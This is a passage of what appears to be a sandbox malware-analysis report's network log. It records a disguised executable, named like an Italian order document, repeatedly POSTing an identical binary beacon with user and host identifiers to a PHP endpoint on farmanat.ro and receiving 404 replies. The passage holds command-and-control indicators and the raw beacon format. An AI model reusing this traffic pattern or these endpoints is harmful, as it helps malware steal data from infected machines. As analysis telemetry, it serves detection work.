Nov 25, 2021 10:48:21.038147926 CET	6346	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:21.072483063 CET	6346	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:21.125472069 CET	6347	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.11.20	50142	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:44.009707928 CET	6733	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:44.043785095 CET	6733	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:44.100363970 CET	6733	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.11.20	50143	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:44.527358055 CET	6734	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:44.560985088 CET	6734	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:44.614161015 CET	6735	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.11.20	50144	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:45.039530993 CET	6735	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:45.073008060 CET	6736	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:45.122705936 CET	6736	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.11.20	50145	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:45.509963989 CET	6737	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:45.544240952 CET	6737	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:45.598488092 CET	6737	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.11.20	50146	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:45.990993977 CET	6738	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:46.025037050 CET	6738	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:46.081789017 CET	6739	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.11.20	50147	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:46.446019888 CET	6739	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:46.479511023 CET	6740	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:46.528537989 CET	6740	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.11.20	50148	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:46.964293957 CET	6741	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:46.998600006 CET	6741	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:47.048317909 CET	6741	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.11.20	50149	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:47.480202913 CET	6742	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:47.513799906 CET	6742	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:47.564080954 CET	6743	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.11.20	50150	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:47.989429951 CET	6743	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:48.023612022 CET	6744	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:48.077389002 CET	6744	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
309	192.168.11.20	50151	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:48.492017984 CET	6745	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:48.526269913 CET	6745	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:48.577016115 CET	6745	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.11.20	49866	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:21.765352011 CET	6347	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:21.798989058 CET	6348	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:21.848124981 CET	6348	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.11.20	50152	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:48.956654072 CET	6746	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:48.990220070 CET	6746	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:49.039484978 CET	6747	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.11.20	50153	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:49.453054905 CET	6747	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:49.487144947 CET	6748	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:49.536742926 CET	6748	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
312	192.168.11.20	50154	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:49.981482029 CET	6749	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:50.015156984 CET	6749	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:50.064557076 CET	6749	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.11.20	50155	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:50.494750977 CET	6750	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:50.528975010 CET	6750	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:50.586895943 CET	6751	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
314	192.168.11.20	50156	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:51.037018061 CET	6751	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:51.071177959 CET	6752	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:51.122132063 CET	6752	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
315	192.168.11.20	50157	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:51.551708937 CET	6753	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:51.585876942 CET	6753	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:51.635710955 CET	6753	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
316	192.168.11.20	50158	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:52.056652069 CET	6754	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:52.090846062 CET	6754	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:52.140773058 CET	6755	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
317	192.168.11.20	50159	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:52.572449923 CET	6755	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:52.606086969 CET	6756	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:52.655607939 CET	6756	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
318	192.168.11.20	50160	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:53.087853909 CET	6757	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:53.122066021 CET	6757	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
